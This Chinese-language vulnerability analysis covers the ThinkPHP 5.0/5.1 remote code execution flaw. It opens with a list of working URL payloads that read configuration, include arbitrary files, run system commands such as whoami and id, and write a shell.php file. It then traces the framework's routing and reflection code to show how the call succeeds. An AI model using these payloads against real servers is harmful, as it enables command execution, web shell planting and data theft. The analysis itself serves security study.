5.0.x
?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id影响版本
5.0.7<=thinkphp<=5.0.22
5.1.x
直接在入口文件处下断点
一路跟到run()方法里面的路由检测部分
跟进routeCheck()方法
public function routeCheck() { $path = $this->request->path(); $depr = $this->config('app.pathinfo_depr'); // 路由检测 $files = scandir($this->routePath); foreach ($files as $file) { if (strpos($file, '.php')) { $filename = $this->routePath . DIRECTORY_SEPARATOR . $file; // 导入路由配置 $rules = include $filename; if (is_array($rules)) { $this->route->import($rules); } } } if ($this->config('app.route_annotation')) { // 自动生成路由定义 if ($this->debug) { $this->build->buildRoute($this->config('app.controller_suffix')); } $filename = $this->runtimePath . 'build_route.php'; if (is_file($filename)) { include $filename; } } // 是否强制路由模式 $must = !is_null($this->routeMust) ? $this->routeMust : $this->config('app.url_route_must'); // 路由检测 返回一个Dispatch对象 return $this->route->check($path, $depr, $must, $this->config('app.route_complete_match')); }
看到最上面$path通过path()方法获取,跟进一下path方法
public function path() { if (is_null($this->path)) { $suffix = $this->config->get('url_html_suffix'); $pathinfo = $this->pathinfo(); if (false === $suffix) { // 禁止伪静态访问 $this->path = $pathinfo; } elseif ($suffix) { // 去除正常的URL后缀 $this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo); } else { // 允许任何后缀访问 $this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo); } } return $this->path; }
最后返回的$path是$pathinfo获取来的,$pathinfo又是通过pathinfo()方法获取来的,跟进pathinfo()方法
通过代码可以发现是通过URL获取来的,根据debug最后返回的值是我们传入的index/\think\Container/invokefunction
回到path方法,经过一些处理,返回值还是index/\think\Container/invokefunction
再回到routeCheck()方法,可以看到有如下判断
// 是否强制路由模式 $must = !is_null($this->routeMust) ? $this->routeMust : $this->config('app.url_route_must');
如果开启了强制路由,那么我们输入的路由将报错导致后面导致程序无法运行,也就不存在RCE漏洞,但是默认是开启的
上面我们就分析完了routeCheck函数,得到了$dispatch的值
接下来我们走到了
$data = $dispatch->run();
跟进一下run()方法
首先是将/替换成了|,得到了$url
然后使用parseUrl()方法处理$url得到$result
跟进parseUrl()方法,关注如下一行代码
list($path, $var) = $this->parseUrlPath($url);
再跟进parseUrlPath()方法
将$url里面的|换成了/,然后通过如下判断根据/将其进行分割成数组存入$path
elseif (strpos($url, '/')) { // [模块/控制器/操作] $path = explode('/', $url);
然后退出parseUrlPath()方法,退出parseUrl()方法,状态如下
接着传入$result实例化Moudle类然后执行run方法
跟进run()方法,接着通过URL获取控制器名
获取操作名
接着跟进实例化控制器,controller方法,保存在$instance
跟进parseModuleAndClass()方法
得到$class和$module的值
接着回到$controller方法,判断类是否存在,如果存在则调用__get()方法,然后回到run方法
判断方法在当前环境是否可以调用,当然可以,然后得到$call和$vars
然后执行
return Container::getInstance()->invokeMethod($call, $vars);
跟进invokeMethod()方法,通过反射方式调用方法
成功实现RCE
如有侵权请联系:admin#unsafe.sh